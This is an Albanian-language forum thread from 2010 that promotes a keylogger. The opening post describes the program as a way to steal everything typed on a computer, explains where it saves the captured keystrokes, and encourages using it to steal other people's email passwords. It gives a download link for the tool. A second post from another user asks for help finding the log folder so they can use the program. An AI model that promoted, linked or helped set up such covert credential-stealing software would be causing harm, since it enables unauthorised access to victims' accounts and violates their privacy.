Akullore Forum
I Pa Identifikuar [Identifikohu - Regjistrohu]
Shko nė fund

Antarėt qė po shikojnė kėtė faqe: Asnjė - 1 Vizitor

Versioni i Printueshėm  
Autori: Subjekti: KeyLogger (ruan gjithqka qe preket ne tastature si passwordat etj)

Antar++
**
Postime: 2
Regjistruar: 30-8-2010

Gjinia: Mashkull
Mosha: 29
Jashtė Linje

Gjendja: Asnjė Gjendje

[*] postuar nė 30-8-2010 nė 03:08
KeyLogger (ruan gjithqka qe preket ne tastature si passwordat etj)


Cituar: Postimi origjinal nga sg1  
Ky software sherben per vjedhjen dhe ruajtjen e cdo fjale apo cdo shkronje qe shtypet ne tastature.
Pasi qe ta instaloni, gjithqka qe shtypni ne tastature do ruhet ne nje file te krijuar ne .txt ne Local Disc C: tek program FIles tek Folderi Home Key Logger.

Pra me kete mund tia vjedhni passwordin e e-mailit cdo personi qe hape cdo adres ne kompjuterin tend :)

Download:
http://www.freewebtown.com/sg1sg1/Hacks/HomeKeylogger.zip
Shiko profilin e antarit Shiko Tė Gjitha postimet nga ky Antar

Antar++
**
Postime: 2
Regjistruar: 30-8-2010

Gjinia: Mashkull
Mosha: 29
Jashtė Linje

Gjendja: Asnjė Gjendje

[*] postuar nė 30-8-2010 nė 03:10


kete nuk mund ta bej dot a me ndihmon dikush se e kam kerkuar ket zarfin qe thua ti ke program files edhe nuk e gjej dot. a ka ndonje menyr tjeter per ta ber kete gje se e dua me patjeter kete program . ju lutem
Shiko profilin e antarit Shiko Tė Gjitha postimet nga ky Antar

  Shko nė fillim

Powered by XMB 1.9.11